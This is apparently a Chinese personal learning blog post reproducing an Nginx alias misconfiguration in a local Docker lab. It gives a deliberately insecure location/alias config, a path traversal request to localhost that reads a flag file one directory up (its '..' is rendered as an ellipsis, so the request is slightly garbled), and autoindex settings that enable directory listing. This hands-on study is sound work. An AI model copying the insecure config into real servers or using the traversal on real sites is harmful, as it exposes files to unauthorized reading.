之前的文章,记录了如何搭建一个docker环境。
接下来,会使用这个docker环境做一些事情,算是个人学习的记录。
首先确保docker已成功部署,环境准备好后,开始复现一个Nginx的漏洞。
看到这里可能会很有疑惑,毕竟如果不知道Nginx与docker,或者相关漏洞的话接着看会很吃力。
所以先期可以了解Nginx、docker相关背景与配置,这些可以通过搜索相关文章进行了解,其次需要有linux基础。
Nginx有个因为配置问题而导致的安全风险,可引发目录遍历(目录穿越)。不过只能跳到上一层目录,读取上一层目录及其任意子目录的文件,不能任意目录遍历读取任意文件。
安装与配置
使用richarvey/nginx-php-fpm镜像,这个是公开的镜像,相关介绍可通过搜索richarvey/nginx-php-fpm。
docker run -d -p 80:80 richarvey/nginx-php-fpm
配置Nginx,添加配置test路由解析到/var/www/html/路径(注意:/test没有结尾的/)
那么如何配置Nginx呢?这里遇到了问题,前期不熟悉docker,直接上手整环境,发现搜索了很多文章也没有头绪,很心酸,后来解决了。
先运行之前下载的容器,如之前已启动可忽略这一步。接着需进入docker内部,命令如下:docker exec -it 容器的id值 /bin/bash
容器的id值如何获取呢?使用docker ps命令获取当前正在运行的容器信息,里面有id值。执行完命令后,就到了docker内部的命令行了,
可像linux系统一样找到Nginx的配置文件路径,然后使用vi修改default.conf即可。
# /etc/nginx/sites-available/default.conf
location /test {
alias /var/www/html/;
}Web服务的文件结构,目标是目录遍历获取flag.txt的内容
|--var
|--www
|--flag.txt
|--html
|--index.php
|--test.txt
漏洞利用
通过访问http://127.0.0.1/test/test.txt
可以成功访问到test的内容如下(/test/test.txt路由请求,经处理后转换成:/var/www/html/test.txt)
this is a test
修改请求为http://127.0.0.1/test…/flag.txt,可以成功跳到上一层目录下,读取到flag.txt的内容(/test…/flag.txt路由请求,经处理后转换成:/var/www/flag.txt)
you get me, hahaha
目录浏览(目录遍历)
出于安全考虑,nginx默认是没有开启目录浏览的,当下面配置加入到nginx配置文件的server段内后可导致目录浏览。
autoindex on; #开启目录浏览
autoindex_exact_size off; #显示文件大小(单位K/M/G)
autoindex_localtime on; #显示修改时间
charset utf-8,gbk; #设置编码
目录浏览配置,个人未成功,希望以后能填一下坑。
